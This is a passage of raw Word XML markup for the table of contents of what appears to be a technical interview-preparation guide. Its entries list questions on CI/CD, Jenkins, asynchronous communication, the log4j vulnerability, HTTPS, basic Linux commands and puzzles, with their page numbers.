                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1175</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F193DB7" w14:textId="438538A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7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o you know anything about CI/CD?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308371 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46617457" w14:textId="4396D9E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7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will Jenkins' job work? Explain the process?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308372 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1178</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23B905CC" w14:textId="4AA69BB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7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Node JS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308373 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1180</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C2034EF" w14:textId="5FDA531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7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ow is your application getting deployed? Which platform are you using in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308374 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1180</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A9B75C9" w14:textId="3CE5753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7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do you know about Asynchronous communication?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308375 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49028C5E" w14:textId="1060004D"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7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are the measure objects i.e key things in order to make Asynchronous calls?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308376 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01CFBEA8" w14:textId="460145F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77"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If I have two different technologies then how can we achieve asynchronous communication?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308377 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19D1D19B" w14:textId="4A0BAE84"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7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o you have exposure in AI and ML?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308378 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2162DEFC" w14:textId="6087EFB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7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amples of Fund Transfer are Synchronous or Asynchronous?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308379 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69113273" w14:textId="4F6AA61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8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Is WhatsApp Synchronous or Asynchronous?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308380 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1184</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53C95BDD" w14:textId="2AF9C4C8"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81"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2 Tier and 3 Tier Architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308381 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6ED61150" w14:textId="312DEFE7"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8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Have you heard about the log4j vulnerability?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308382 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1186</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="256316B6" w14:textId="5A7F753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8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What is https protocol?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308383 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1186</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="656B0647" w14:textId="11B7379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8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Difference between http and https?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308384 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55DCBA8B" w14:textId="656180A9"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85"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Suppose in server one job at 9 AM and copy json file and paste it in temp folder another job 6 PM read it and load in db and no one should change the file. How to prevent file from any Change?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308385 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1188</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FED3DCA" w14:textId="3A0B4D50"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86"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If we increase timeout then how can we resolve it? Deployment related issue and how will you handle it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308386 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1189</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B683950" w14:textId="7D6A4859" w:rsidR="00012799" w:rsidRDefault="00012799">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308387" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308387 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1191</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="086B7E1E" w14:textId="061C47FC"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88"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Explain Linux commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308388 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1191</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ED20663" w14:textId="1D7E0AF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89"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Command - Read a file and print first two lines from file Ans. head -2 filename?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308389 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1193</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A4BD45C" w14:textId="6AEA6E61"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90"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Search a word from a file?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308390 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1193</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A1EC9CD" w14:textId="1E84C8CA" w:rsidR="00012799" w:rsidRDefault="00012799">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308391" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Puzzles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308391 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A30AB65" w14:textId="0FE4D0B6"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92"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uzzle – 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308392 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="582C0713" w14:textId="7F3E04BE"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93"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uzzle – 2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308393 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C184563" w14:textId="4BED10D2" w:rsidR="00012799" w:rsidRDefault="00012799">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308394" w:history="1">
            <w:r w:rsidRPr="00D7320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73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Puzzle – 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308394 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="318CDD27" w14:textId="3A2AA681" w:rsidR="006C086A" w:rsidRPr="00CE4B95" w:rsidRDefault="006C086A">
          <w:pPr>
            <w:rPr>
